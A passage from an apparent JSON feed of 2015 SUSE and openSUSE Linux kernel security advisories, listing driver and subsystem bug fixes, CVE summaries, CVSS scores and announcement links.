snoop behavior (boo#934755).\n - ALSA: hda - Add workaround for MacBook Air 5,2 built-in mic (boo#934755).\n - ALSA: hda - Disable runtime PM for Panther Point again (boo#934755).\n - ALSA: hda - Do not access stereo amps for mono channel widgets\n (boo#934755).\n - ALSA: hda - Fix Dock Headphone on Thinkpad X250 seen as a Line Out\n (boo#934755).\n - ALSA: hda - Fix headphone pin config for Lifebook T731 (boo#934755).\n - ALSA: hda - Fix noise on AMD radeon 290x controller (boo#934755).\n - ALSA: hda - Fix probing and stuttering on CMI8888 HD-audio controller\n (boo#934755).\n - ALSA: hda - One more Dell macine needs DELL1_MIC_NO_PRESENCE quirk\n (boo#934755).\n - ALSA: hda - One more HP machine needs to change mute led quirk\n (boo#934755).\n - ALSA: hda - Set GPIO 4 low for a few HP machines (boo#934755).\n - ALSA: hda - Set single_adc_amp flag for CS420x codecs (boo#934755).\n - ALSA: hda - Treat stereo-to-mono mix properly (boo#934755).\n - ALSA: hda - change three SSID quirks to one pin quirk (boo#934755).\n - ALSA: hda - fix "num_steps = 0" error on ALC256 (boo#934755).\n - ALSA: hda - fix a typo by changing mute_led_nid to cap_mute_led_nid\n (boo#934755).\n - ALSA: hda - fix headset mic detection problem for one more machine\n (boo#934755).\n - ALSA: hda - fix mute led problem for three HP laptops (boo#934755).\n - ALSA: hda - set proper caps for newer AMD hda audio in KB/KV\n (boo#934755).\n - ALSA: hda/realtek - ALC292 dock fix for Thinkpad L450 (boo#934755).\n - ALSA: hda/realtek - Add a fixup for another Acer Aspire 9420\n (boo#934755).\n - ALSA: hda/realtek - Enable the ALC292 dock fixup on the Thinkpad T450\n (boo#934755).\n - ALSA: hda/realtek - Fix Headphone Mic does not recording for ALC256\n (boo#934755).\n - ALSA: hda/realtek - Make more stable to get pin sense for ALC283\n (boo#934755).\n - ALSA: hda/realtek - Support Dell headset mode for ALC256 (boo#934755).\n - ALSA: hda/realtek - Support HP mute led for output and input\n (boo#934755).\n - ALSA: hda/realtek - move HP_LINE1_MIC1_LED quirk for alc282 (boo#934755).\n - ALSA: hda/realtek - move HP_MUTE_LED_MIC1 quirk for alc282 (boo#934755).\n - ALSA: hdspm - Constrain periods to 2 on older cards (boo#934755).\n - ALSA: pcm: Do not leave PREPARED state after draining (boo#934755).\n - ALSA: snd-usb: add quirks for Roland UA-22 (boo#934755).\n - ALSA: usb - Creative USB X-Fi Pro SB1095 volume knob support\n (boo#934755).\n - ALSA: usb-audio: Add mic volume fix quirk for Logitech Quickcam Fusion\n (boo#934755).\n - ALSA: usb-audio: Add quirk for MS LifeCam HD-3000 (boo#934755).\n - ALSA: usb-audio: Add quirk for MS LifeCam Studio (boo#934755).\n - ALSA: usb-audio: Do not attempt to get Lifecam HD-5000 sample rate\n (boo#934755).\n - ALSA: usb-audio: Do not attempt to get Microsoft Lifecam Cinema sample\n rate (boo#934755).\n - ALSA: usb-audio: add MAYA44 USB+ mixer control names (boo#934755).\n - ALSA: usb-audio: do not try to get Benchmark DAC1 sample rate\n (boo#934755).\n - ALSA: usb-audio: do not try to get Outlaw RR2150 sample rate\n (boo#934755).\n - ALSA: usb-audio: fix missing input volume controls in MAYA44 USB(+)\n (boo#934755).\n - Automatically Provide/Obsolete all subpackages of old flavors\n (bnc#925567)\n - Fix kABI for ak411x structs (boo#934755).\n - Fix kABI for snd_emu10k1 struct (boo#934755).\n - HID: add ALWAYS_POLL quirk for a Logitech 0xc007 (bnc#929624).\n - HID: add HP OEM mouse to quirk ALWAYS_POLL (bnc#929624).\n - HID: add quirk for PIXART OEM mouse used by HP (bnc#929624).\n - HID: usbhid: add always-poll quirk (bnc#929624).\n - HID: usbhid: add another mouse that needs QUIRK_ALWAYS_POLL (bnc#929624).\n - HID: usbhid: enable always-poll quirk for Elan Touchscreen (bnc#929624).\n - HID: usbhid: enable always-poll quirk for Elan Touchscreen 009b\n (bnc#929624).\n - HID: usbhid: enable always-poll quirk for Elan Touchscreen 0103\n (bnc#929624).\n - HID: usbhid: enable always-poll quirk for Elan Touchscreen 016f\n (bnc#929624).\n - HID: usbhid: fix PIXART optical mouse (bnc#929624).\n - HID: usbhid: more mice with ALWAYS_POLL (bnc#929624).\n - HID: usbhid: yet another mouse with ALWAYS_POLL (bnc#929624).\n - HID: yet another buggy ELAN touchscreen (bnc#929624).\n - Input: synaptics - handle spurious release of trackstick buttons\n (bnc#928693).\n - Input: synaptics - re-route tracksticks buttons on the Lenovo 2015\n series (bnc#928693).\n - Input: synaptics - remove TOPBUTTONPAD property for Lenovos 2015\n (bnc#928693).\n - Input: synaptics - retrieve the extended capabilities in query $10\n (bnc#928693).\n - NFSv4: When returning a delegation, do not reclaim an incompatible open\n mode (bnc#934202).\n - Refresh patches.xen/xen-blkfront-indirect (bsc#922235).\n - Update config files: extend CONFIG_DPM_WATCHDOG_TIMEOUT to 60\n (bnc#934397)\n - arm64: mm: Remove hack in mmap randomized layout Fix commit id and\n mainlined information\n - bnx2x: Fix kdump when iommu=on (bug#921769).\n - client MUST ignore EncryptionKeyLength if CAP_EXTENDED_SECURITY is set\n (bnc#932348).\n - config/armv7hl: Disable AMD_XGBE_PHY The AMD XGBE ethernet chip is only\n used on ARM64 systems.\n - config: disable XGBE on non-ARM hardware It is documented as being\n present only on AMD SoCs.\n - cpufreq: fix a NULL pointer dereference in __cpufreq_governor()\n (bsc#924664).\n - drm/i915/bdw: PCI IDs ending in 0xb are ULT (boo#935913).\n - drm/i915/chv: Remove Wait for a previous gfx force-off (boo#935913).\n - drm/i915/dp: only use training pattern 3 on platforms that support it\n (boo#935913).\n - drm/i915/dp: there is no audio on port A (boo#935913).\n - drm/i915/hsw: Fix workaround for server AUX channel clock divisor\n (boo#935913).\n - drm/i915/vlv: remove wait for previous GFX clk disable request\n (boo#935913).\n - drm/i915/vlv: save/restore the power context base reg (boo#935913).\n - drm/i915: Add missing MacBook Pro models with dual channel LVDS\n (boo#935913).\n - drm/i915: BDW Fix Halo PCI IDs marked as ULT (boo#935913).\n - drm/i915: Ban Haswell from using RCS flips (boo#935913).\n - drm/i915: Check obj-&gt;vma_list under the struct_mutex (boo#935913).\n - drm/i915: Correct the IOSF Dev_FN field for IOSF transfers (boo#935913).\n - drm/i915: Dell Chromebook 11 has PWM backlight (boo#935913).\n - drm/i915: Disable caches for Global GTT (boo#935913).\n - drm/i915: Do a dummy DPCD read before the actual read (bnc#907714).\n - drm/i915: Do not complain about stolen conflicts on gen3 (boo#935913).\n - drm/i915: Do not leak pages when freeing userptr objects (boo#935913).\n - drm/i915: Dont enable CS_PARSER_ERROR interrupts at all (boo#935913).\n - drm/i915: Evict CS TLBs between batches (boo#935913).\n - drm/i915: Fix DDC probe for passive adapters (boo#935913).\n - drm/i915: Fix and clean BDW PCH identification (boo#935913).\n - drm/i915: Force the CS stall for invalidate flushes (boo#935913).\n - drm/i915: Handle failure to kick out a conflicting fb driver\n (boo#935913).\n - drm/i915: Ignore SURFLIVE and flip counter when the GPU gets reset\n (boo#935913).\n - drm/i915: Ignore VBT backlight check on Macbook 2, 1 (boo#935913).\n - drm/i915: Invalidate media caches on gen7 (boo#935913).\n - drm/i915: Kick fbdev before vgacon (boo#935913).\n - drm/i915: Only fence tiled region of object (boo#935913).\n - drm/i915: Only warn the first time we attempt to mmio whilst suspended\n (boo#935913).\n - drm/i915: Unlock panel even when LVDS is disabled (boo#935913).\n - drm/i915: Use IS_HSW_ULT() in a HSW specific code path (boo#935913).\n - drm/i915: cope with large i2c transfers (boo#935913).\n - drm/i915: do not warn if backlight unexpectedly enabled (boo#935913).\n - drm/i915: drop WaSetupGtModeTdRowDispatch:snb (boo#935913).\n - drm/i915: save/restore GMBUS freq across suspend/resume on gen4\n (boo#935913).\n - drm/i915: vlv: fix IRQ masking when uninstalling interrupts (boo#935913).\n - drm/i915: vlv: fix save/restore of GFX_MAX_REQ_COUNT reg (boo#935913).\n - drm/radeon: retry dcpd fetch (bnc#931580).\n - ftrace/x86/xen: use kernel identity mapping only when really needed\n (bsc#873195, bsc#886272, bsc#903727, bsc#927725)\n - guards: Add support for an external filelist in --check mode This will\n allow us to run --check without a kernel-source.git work tree.\n - guards: Include the file name also in the "Not found" error\n - guards: Simplify help text\n - hyperv: Add processing of MTU reduced by the host (bnc#919596).\n - ideapad_laptop: Lenovo G50-30 fix rfkill reports wireless blocked\n (boo#939394).\n - ipv6: do not delete previously existing ECMP routes if add fails\n (bsc#930399).\n - ipv6: fix ECMP route replacement (bsc#930399).\n - ipv6: replacing a rt6_info needs to purge possible propagated rt6_infos\n too (bsc#930399).\n - kABI: protect linux/slab.h include in of/address.\n - kabi/severities: ignore already-broken but acceptable kABI changes -\n SYSTEM_TRUSTED_KEYRING=n change removed system_trusted_keyring -\n Commits 3688875f852 and ea5ed8c70e9 changed iov_iter_get_pages\n prototype - KVM changes are intermodule dependencies\n - kabi: Fix CRC for dma_get_required_mask.\n - kabi: add kABI reference files\n - libata: Blacklist queued TRIM on Samsung SSD 850 Pro (bsc#926156).\n - libata: Blacklist queued TRIM on all Samsung 800-series (bnc#930599).\n - net: ppp: Do not call bpf_prog_create() in ppp_lock (bnc#930488).\n - rpm/kernel-obs-qa.spec.in: Do not fail if the kernel versions do not\n match\n - rt2x00: do not align payload on modern H/W (bnc#932844).\n - rtlwifi: rtl8192cu: Fix kernel deadlock (bnc#927786).\n - thermal: step_wise: Revert optimization (boo#925961).\n - tty: Fix pty master poll() after slave closes v2 (bsc#937138). arm64:\n mm: Remove hack in mmap randomize layout (bsc#937033)\n - udf: Remove repeated loads blocksize (bsc#933907).\n - usb: core: Fix USB 3.0 devices lost in NOTATTACHED state after a hub\n port reset (bnc#937226).\n - x86, apic: Handle a bad TSC more gracefully (boo#935530).\n - x86/PCI: Use host bridge _CRS info on Foxconn K8M890-8237A (bnc#907092).\n - x86/PCI: Use host bridge _CRS info on systems with &gt;32 bit addressing\n (bnc#907092).\n - x86/microcode/amd: Do not overwrite final patch levels (bsc#913996).\n - x86/microcode/amd: Extract current patch level read to a function\n (bsc#913996).\n - x86/mm: Improve AMD Bulldozer ASLR workaround (bsc#937032).\n - xenbus: add proper handling of XS_ERROR from Xenbus for transactions.\n - xhci: Calculate old endpoints correctly on device reset (bnc#938976).\n\n", "edition": 1, "modified": "2015-08-14T11:09:20", "published": "2015-08-14T11:09:20", "id": "OPENSUSE-SU-2015:1382-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-08/msg00011.html", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:42:04", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1421"], "description": "This update supplies kgraft patches to fix one security vulnerability.\n\n CVE-2015-1421: A use-after-free vulnerability in the sctp_assoc_update\n function in net/sctp/associola.c in the Linux kernel allowed remote\n attackers to cause a denial of service (slab corruption and panic) or\n possibly have unspecified other impact by triggering an INIT collision\n that leads to improper handling of shared-key data.\n\n This patch supplies kgraft patches for the first kernel update and the\n second kernel update published for SUSE Linux Enterprise Server 12. The\n third kernel update contains the patch already.\n\n", "edition": 1, "modified": "2015-05-07T20:04:53", "published": "2015-05-07T20:04:53", "id": "SUSE-SU-2015:0832-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00001.html", "title": "Security update for kgraft-patch-SLE12_Update_1, kgraft-patch-SLE12_Update_2 (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:46:39", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7822", "CVE-2014-3673", "CVE-2014-8160", "CVE-2014-7841", "CVE-2014-8559", "CVE-2014-9584", "CVE-2014-9419", "CVE-2014-3687"], "description": "The SUSE Linux Enterprise 12 kernel was updated to 3.12.38 to receive\n various security and bugfixes.\n\n This update contains the following feature enablements:\n - The remote block device (rbd) and ceph drivers have been enabled and are\n now supported. (FATE#318350) These can be used e.g. for accessing the\n SUSE Enterprise Storage product services.\n\n - Support for Intel Select Bay trail CPUs has been added. (FATE#316038)\n\n Following security issues were fixed:\n - CVE-2014-9419: The __switch_to function in arch/x86/kernel/process_64.c\n in the Linux kernel through 3.18.1 did not ensure that Thread Local\n Storage (TLS) descriptors were loaded before proceeding with other\n steps, which made it easier for local users to bypass the ASLR\n protection mechanism via a crafted application that reads a TLS base\n address (bnc#911326).\n\n - CVE-2014-7822: A flaw was found in the way the Linux kernels splice()\n system call validated its parameters. On certain file systems, a local,\n unprivileged user could have used this flaw to write past the maximum\n file size, and thus crash the system.\n\n - CVE-2014-8160: The connection tracking module could be bypassed if a\n specific protocol module was not loaded, e.g. allowing SCTP traffic\n while the firewall should have filtered it.\n\n - CVE-2014-9584: The parse_rock_ridge_inode_internal function in\n fs/isofs/rock.c in the Linux kernel before 3.18.2 did not validate a\n length value in the Extensions Reference (ER) System Use Field, which\n allowed local users to obtain sensitive information from kernel memory\n via a crafted iso9660 image (bnc#912654).\n\n The following non-security bugs were fixed:\n - audit: Allow login in non-init namespaces (bnc#916107).\n - btrfs: avoid unnecessary switch of path locks to blocking mode.\n - btrfs: fix directory inconsistency after fsync log replay (bnc#915425).\n - btrfs: fix fsync log replay for inodes with a mix of regular refs and\n extrefs (bnc#915425).\n - btrfs: fix fsync race leading to ordered extent memory leaks\n (bnc#917128).\n - btrfs: fix fsync when extend references are added to an inode\n (bnc#915425).\n - btrfs: fix missing error handler if submiting re-read bio fails.\n - btrfs: fix race between transaction commit and empty block group removal\n (bnc#915550).\n - btrfs: fix scrub race leading to use-after-free (bnc#915456).\n - btrfs: fix setup_leaf_for_split() to avoid leaf corruption (bnc#915454).\n - btrfs: improve free space cache management and space allocation.\n - btrfs: make btrfs_search_forward return with nodes unlocked.\n - btrfs: scrub, fix sleep in atomic context (bnc#915456).\n - btrfs: unlock nodes earlier when inserting items in a btree.\n - drm/i915: On G45 enable cursor plane briefly after enabling the display\n plane (bnc#918161).\n - Fix Module.supported handling for external modules (bnc#905304).\n - keys: close race between key lookup and freeing (bnc#912202).\n - msi: also reject resource with flags all clear.\n - pci: Add ACS quirk for Emulex NICs (bug#917089).\n - pci: Add ACS quirk for Intel 10G NICs (bug#917089).\n - pci: Add ACS quirk for Solarflare SFC9120 & SFC9140 (bug#917089).\n - Refresh other Xen patches (bsc#909829).\n - Update\n patches.suse/btrfs-8177-improve-free-space-cache-management-and-space-.patc\n h (bnc#895805).\n - be2net: avoid flashing SH-B0 UFI image on SH-P2 chip (bug#908322).\n - be2net: refactor code that checks flash file compatibility (bug#908322).\n - ceph: Add necessary clean up if invalid reply received in handle_reply()\n (bsc#918255).\n - crush: CHOOSE_LEAF -&gt; CHOOSELEAF throughout (bsc#918255).\n - crush: add SET_CHOOSE_TRIES rule step (bsc#918255).\n - crush: add note about r in recursive choose (bsc#918255).\n - crush: add set_choose_local_[fallback_]tries steps (bsc#918255).\n - crush: apply chooseleaf_tries to firstn mode too (bsc#918255).\n - crush: attempts -&gt; tries (bsc#918255).\n - crush: clarify numrep vs endpos (bsc#918255).\n - crush: eliminate CRUSH_MAX_SET result size limitation (bsc#918255).\n - crush: factor out (trivial) crush_destroy_rule() (bsc#918255).\n - crush: fix crush_choose_firstn comment (bsc#918255).\n - crush: fix some comments (bsc#918255).\n - crush: generalize descend_once (bsc#918255).\n - crush: new SET_CHOOSE_LEAF_TRIES command (bsc#918255).\n - crush: pass parent r value for indep call (bsc#918255).\n - crush: pass weight vector size to map function (bsc#918255).\n - crush: reduce scope of some local variables (bsc#918255).\n - crush: return CRUSH_ITEM_UNDEF for failed placements with indep\n (bsc#918255).\n - crush: strip firstn conditionals out of crush_choose, rename\n (bsc#918255).\n - crush: use breadth-first search for indep mode (bsc#918255).\n - crypto: drbg - panic on continuous self test error (bsc#905482).\n - dasd: List corruption in error recovery (bnc#914291, LTC#120865).\n - epoll: optimize setting task running after blocking (epoll-performance).\n - fips: We need to activate gcm(aes) in FIPS mode, RFCs 4106 and 4543\n (bsc#914126,bsc#914457).\n - fips: __driver-gcm-aes-aesni needs to be listed explicitly inside the\n testmgr.c file (bsc#914457).\n - flow_dissector: add tipc support (bnc#916513).\n - hotplug, powerpc, x86: Remove cpu_hotplug_driver_lock() (bsc#907069).\n - hyperv: Add support for vNIC hot removal.\n - kernel: incorrect clock_gettime result (bnc#914291, LTC#121184).\n - kvm: iommu: Add cond_resched to legacy device assignment code\n (bsc#898687).\n - libceph: CEPH_OSD_FLAG_* enum update (bsc#918255).\n - libceph: add ceph_kv{malloc,free}() and switch to them (bsc#918255).\n - libceph: add ceph_pg_pool_by_id() (bsc#918255).\n - libceph: all features fields must be u64 (bsc#918255).\n - libceph: dout() is missing a newline (bsc#918255).\n - libceph: factor out logic from ceph_osdc_start_request() (bsc#918255).\n - libceph: fix error handling in ceph_osdc_init() (bsc#918255).\n - libceph: follow redirect replies from osds (bsc#918255).\n - libceph: follow {read,write}_tier fields on osd request submission\n (bsc#918255).\n - libceph: introduce and start using oid abstraction (bsc#918255).\n - libceph: rename MAX_OBJ_NAME_SIZE to CEPH_MAX_OID_NAME_LEN (bsc#918255).\n - libceph: rename ceph_osd_request::r_{oloc,oid} to r_base_{oloc,oid}\n (bsc#918255).\n - libceph: replace ceph_calc_ceph_pg() with ceph_oloc_oid_to_pg()\n (bsc#918255).\n - libceph: start using oloc abstraction (bsc#918255).\n - libceph: take map_sem for read in handle_reply() (bsc#918255).\n - libceph: update ceph_features.h (bsc#918255).\n - libceph: use CEPH_MON_PORT when the specified port is 0 (bsc#918255).\n - locking/mutex: Explicitly mark task as running after wakeup (mutex\n scalability).\n - locking/osq: No need for load/acquire when acquire-polling (mutex\n scalability).\n - locking/rtmutex: Optimize setting task running after being blocked\n (mutex scalability).\n - mm/compaction: fix wrong order check in compact_finished() (VM\n Performance, bnc#904177).\n - mm/compaction: stop the isolation when we isolate enough freepage (VM\n Performance, bnc#904177).\n - mm: fix negative nr_isolated counts (VM Performance).\n - mutex-debug: Always clear owner field upon mutex_unlock() (mutex bugfix).\n - net: 8021q/bluetooth/bridge/can/ceph: Remove extern from function\n prototypes (bsc#918255).\n - net: allow macvlans to move to net namespace (bnc#915660).\n - net:socket: set msg_namelen to 0 if msg_name is passed as NULL in msghdr\n struct from userland (bnc#900270).\n - nfs_prime_dcache needs fh to be set (bnc#908069 bnc#896484).\n - ocfs2: remove filesize checks for sync I/O journal commit (bnc#800255).\n Update references.\n - powerpc/xmon: Fix another endiannes issue in RTAS call from xmon\n (bsc#915188).\n - pvscsi: support suspend/resume (bsc#902286).\n - random: account for entropy loss due to overwrites\n (bsc#904883,bsc#904901).\n - random: allow fractional bits to be tracked (bsc#904883,bsc#904901).\n - random: statically compute poolbitshift, poolbytes, poolbits\n (bsc#904883,bsc#904901).\n - rbd: add "^A" sysfs rbd device attribute (bsc#918255).\n - rbd: add support for single-major device number allocation scheme\n (bsc#918255).\n - rbd: enable extended devt in single-major mode (bsc#918255).\n - rbd: introduce rbd_dev_header_unwatch_sync() and switch to it\n (bsc#918255).\n - rbd: rbd_device::dev_id is an int, format it as such (bsc#918255).\n - rbd: refactor rbd_init() a bit (bsc#918255).\n - rbd: switch to ida for rbd id assignments (bsc#918255).\n - rbd: tear down watch request if rbd_dev_device_setup() fails\n (bsc#918255).\n - rbd: tweak "loaded" message and module description (bsc#918255).\n - rbd: wire up is_visible() sysfs callback for rbd bus (bsc#918255).\n - rpm/kernel-binary.spec.in: Own the modules directory in the devel\n package (bnc#910322)\n - s390/dasd: fix infinite loop during format (bnc#914291, LTC#120608).\n - s390/dasd: remove unused code (bnc#914291, LTC#120608).\n - sched/Documentation: Remove unneeded word (mutex scalability).\n - sched/completion: Add lock-free checking of the blocking case (scheduler\n scalability).\n - scsifront: avoid acquiring same lock twice if ring is full.\n - scsifront: do not use bitfields for indicators modified under different\n locks.\n - swiotlb: Warn on allocation failure in swiotlb_alloc_coherent\n (bsc#905783).\n - uas: Add NO_ATA_1X for VIA VL711 devices (bnc#914254).\n - uas: Add US_FL_NO_ATA_1X for 2 more Seagate disk enclosures (bnc#914254).\n - uas: Add US_FL_NO_ATA_1X for Seagate devices with usb-id 0bc2:a013\n (bnc#914254).\n - uas: Add US_FL_NO_ATA_1X quirk for 1 more Seagate model (bnc#914254).\n - uas: Add US_FL_NO_ATA_1X quirk for 2 more Seagate models (bnc#914254).\n - uas: Add US_FL_NO_ATA_1X quirk for Seagate (0bc2:ab20) drives\n (bnc#914254).\n - uas: Add a quirk for rejecting ATA_12 and ATA_16 commands (bnc#914254).\n - uas: Add missing le16_to_cpu calls to asm1051 / asm1053 usb-id check\n (bnc#914294).\n - uas: Add no-report-opcodes quirk (bnc#914254).\n - uas: Disable uas on ASM1051 devices (bnc#914294).\n - uas: Do not blacklist ASM1153 disk enclosures (bnc#914294).\n - uas: Use streams on upcoming 10Gbps / 3.1 USB (bnc#914464).\n - uas: disable UAS on Apricorn SATA dongles (bnc#914300).\n - usb-storage: support for more than 8 LUNs (bsc#906196).\n - x86, crash: Allocate enough low-mem when crashkernel=high (bsc#905783).\n - x86, crash: Allocate enough low-mem when crashkernel=high (bsc#905783).\n - x86, swiotlb: Try coherent allocations with __GFP_NOWARN (bsc#905783).\n - x86/hpet: Make boot_hpet_disable extern (bnc#916646).\n - x86/intel: Add quirk to disable HPET for the Baytrail platform\n (bnc#916646).\n - x86: irq: Check for valid irq descriptor\n incheck_irq_vectors_for_cpu_disable (bnc#914726).\n - x86: irq: Check for valid irq descriptor in\n check_irq_vectors_for_cpu_disable (bnc#914726).\n - xhci: Add broken-streams quirk for Fresco Logic FL1000G xhci controllers\n (bnc#914112).\n - zcrypt: Number of supported ap domains is not retrievable (bnc#914291,\n LTC#120788).\n\n", "edition": 1, "modified": "2015-03-18T22:04:55", "published": "2015-03-18T22:04:55", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00020.html", "id": "SUSE-SU-2015:0529-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:19:38", "bulletinFamily": "unix", "cvelist": ["CVE-2015-2830", "CVE-2014-9529", "CVE-2015-2922", "CVE-2015-3339", "CVE-2015-3331", "CVE-2015-1421", "CVE-2014-8159", "CVE-2015-0777", "CVE-2015-3636", "CVE-2014-9683", "CVE-2015-2150", "CVE-2014-8086", "CVE-2015-2041", "CVE-2014-9419", "CVE-2015-2042"], "description": "The SUSE Linux Enterprise 11 Service Pack 3 RealTime Extension kernel was\n updated to fix various bugs and security issues.\n\n The following vulnerabilities have been fixed:\n\n CVE-2015-3636: A missing sk_nulls_node_init() in ping_unhash() inside the\n ipv4 stack can cause crashes if a disconnect is followed by another\n connect() attempt. (bnc#929525)\n\n CVE-2015-3339: Race condition in the prepare_binprm function in fs/exec.c\n in the Linux kernel before 3.19.6 allows local users to gain privileges by\n executing a setuid program at a time instant when a chown to root is in\n progress, and the ownership is changed but the setuid bit is not yet\n stripped. (bnc#928130)\n\n CVE-2015-3331: The __driver_rfc4106_decrypt function in\n arch/x86/crypto/aesni-intel_glue.c in the Linux kernel before 3.19.3 does\n not properly determine the memory locations used for encrypted data, which\n allows context-dependent attackers to cause a denial of service (buffer\n overflow and system crash) or possibly execute arbitrary code by\n triggering a crypto API call, as demonstrated by use of a libkcapi test\n program with an AF_ALG(aead) socket. (bnc#927257)\n\n CVE-2015-2922: The ndisc_router_discovery function in net/ipv6/ndisc.c in\n the Neighbor Discovery (ND) protocol implementation in the IPv6 stack in\n the Linux kernel before 3.19.6 allows remote attackers to reconfigure a\n hop-limit setting via a small hop_limit value in a Router Advertisement\n (RA) message. (bnc#922583)\n\n CVE-2015-2830: arch/x86/kernel/entry_64.S in the Linux kernel before\n 3.19.2 does not prevent the TS_COMPAT flag from reaching a user-mode task,\n which might allow local users to bypass the seccomp or audit protection\n mechanism via a crafted application that uses the (1) fork or (2) close\n system call, as demonstrated by an attack against seccomp before 3.16.\n (bnc#926240)\n\n CVE-2015-2150: XSA-120: Xen 3.3.x through 4.5.x and the Linux kernel\n through 3.19.1 do not properly restrict access to PCI command registers,\n which might allow local guest users to cause a denial of service\n (non-maskable interrupt and host crash) by disabling the (1) memory or (2)\n I/O decoding for a PCI Express device and then accessing the device, which\n triggers an Unsupported Request (UR) response. (bnc#919463)\n\n CVE-2015-2042: net/rds/sysctl.c in the Linux kernel before 3.19 uses an\n incorrect data type in a sysctl table, which allows local users to obtain\n potentially sensitive information from kernel memory or possibly have\n unspecified other impact by accessing a sysctl entry. (bnc#919018)\n\n CVE-2015-2041: net/llc/sysctl_net_llc.c in the Linux kernel before 3.19\n uses an incorrect data type in a sysctl table, which allows local users to\n obtain potentially sensitive information from kernel memory or possibly\n have unspecified other impact by accessing a sysctl entry. (bnc#919007)\n\n CVE-2015-1421: Use-after-free vulnerability in the sctp_assoc_update\n function in net/sctp/associola.c in the Linux kernel before 3.18.8 allows\n remote attackers to cause a denial of service (slab corruption and panic)\n or possibly have unspecified other impact by triggering an INIT collision\n that leads to improper handling of shared-key data. (bnc#915577)\n\n CVE-2015-0777: drivers/xen/usbback/usbback.c in linux-2.6.18-xen-3.4.0\n (aka the Xen 3.4.x support patches for the Linux kernel 2.6.18), as used\n in the Linux kernel 2.6.x and 3.x in SUSE Linux distributions, allows\n guest OS users to obtain sensitive information from uninitialized\n locations in host OS kernel memory via unspecified vectors. (bnc#917830)\n\n CVE-2014-9683: Off-by-one error in the ecryptfs_decode_from_filename\n function in fs/ecryptfs/crypto.c in the eCryptfs subsystem in the Linux\n kernel before 3.18.2 allows local users to cause a denial of service\n (buffer overflow and system crash) or possibly gain privileges via a\n crafted filename. (bnc#918333)\n\n CVE-2014-9529: Race condition in the key_gc_unused_keys function in\n security/keys/gc.c in the Linux kernel through 3.18.2 allows local users\n to cause a denial of service (memory corruption or panic) or possibly have\n unspecified other impact via keyctl commands that trigger access to a key\n structure member during garbage collection of a key. (bnc#912202)\n\n CVE-2014-9419: The __switch_to function in arch/x86/kernel/process_64.c in\n the Linux kernel through 3.18.1 does not ensure that Thread Local Storage\n (TLS) descriptors are loaded before proceeding with other steps, which\n makes it easier for local users to bypass the ASLR protection mechanism\n via a crafted application that reads a TLS base address. (bnc#911326)\n\n CVE-2014-8159: The InfiniBand (IB) implementation in the Linux kernel does\n not properly restrict use of User Verbs for registration of memory\n regions, which allows local users to access arbitrary physical memory\n locations, and consequently cause a denial of service (system crash) or\n gain privileges, by leveraging permissions on a uverbs device under\n /dev/infiniband/. (bnc#914742)\n\n CVE-2014-8086: Race condition in the ext4_file_write_iter function in\n fs/ext4/file.c in the Linux kernel through 3.17 allows local users to\n cause a denial of service (file unavailability) via a combination of a\n write action and an F_SETFL fcntl operation for the O_DIRECT flag.\n (bnc#900881)\n\n The following non-security bugs have been fixed:\n\n * mm: exclude reserved pages from dirtyable memory (bnc#931015,\n bnc#930788).\n * mm: fix calculation of dirtyable memory (bnc#931015, bnc#930788).\n * mm/page-writeback.c: fix dirty_balance_reserve subtraction from\n dirtyable memory (bnc#931015, bnc#930788).\n * mm, oom: fix and cleanup oom score calculations (bnc#930171).\n * mm: fix anon_vma->degree underflow in anon_vma endless growing\n prevention (bnc#904242).\n * mm, slab: lock the correct nodelist after reenabling irqs\n (bnc#926439).\n * x86: irq: Check for valid irq descriptor\n incheck_irq_vectors_for_cpu_disable (bnc#914726).\n * x86/mce: Introduce mce_gather_info() (bsc#914987).\n * x86/mce: Fix mce regression from recent cleanup (bsc#914987).\n * x86/mce: Update MCE severity condition check (bsc#914987).\n * x86, kvm: Remove incorrect redundant assembly constraint\n (bnc#931850).\n * x86/reboot: Fix a warning message triggered by stop_other_cpus()\n (bnc#930284).\n * x86/apic/uv: Update the UV APIC HUB check (bsc#929145).\n * x86/apic/uv: Update the UV APIC driver check (bsc#929145).\n * x86/apic/uv: Update the APIC UV OEM check (bsc#929145).\n * kabi: invalidate removed sys_elem_dir::children (bnc#919589).\n * kabi: fix for changes in the sysfs_dirent structure (bnc#919589).\n * iommu/amd: Correctly encode huge pages in iommu page tables\n (bsc#931014).\n * iommu/amd: Optimize amd_iommu_iova_to_phys for new fetch_pte\n interface (bsc#931014).\n * iommu/amd: Optimize alloc_new_range for new fetch_pte interface\n (bsc#931014).\n * iommu/amd: Optimize iommu_unmap_page for new fetch_pte interface\n (bsc#931014).\n * iommu/amd: Return the pte page-size in fetch_pte (bsc#931014).\n * rtc: Prevent the automatic reboot after powering off the system\n (bnc#930145)\n * rtc: Restore the RTC alarm time to the configured alarm time in BIOS\n Setup (bnc#930145, bnc#927262).\n * rtc: Add more TGCS models for alarm disable quirk (bnc#927262).\n * kernel: Fix IA64 kernel/kthread.c build woes. Hide #include\n <linux/hardirq.h> from kABI checker.\n * cpu: Correct cpu affinity for dlpar added cpus (bsc#928970).\n * proc: deal with deadlock in d_walk fix (bnc#929148, bnc#929283).\n * proc: /proc/stat: convert to single_open_size() (bnc#928122).\n * proc: new helper: single_open_size() (bnc#928122).\n * proc: speed up /proc/stat handling (bnc#928122).\n * sched: Fix potential near-infinite distribute_cfs_runtime() loop\n (bnc#930786)\n * tty: Correct tty buffer flush (bnc#929647).\n * tty: hold lock across tty buffer finding and buffer filling\n (bnc#929647).\n * fork: report pid reservation failure properly (bnc#909684).\n * random: Fix add_timer_randomness throttling\n (bsc#904883,bsc#904901,FATE#317374).\n * random: account for entropy loss due to overwrites (FATE#317374).\n * random: allow fractional bits to be tracked (FATE#317374).\n * random: statically 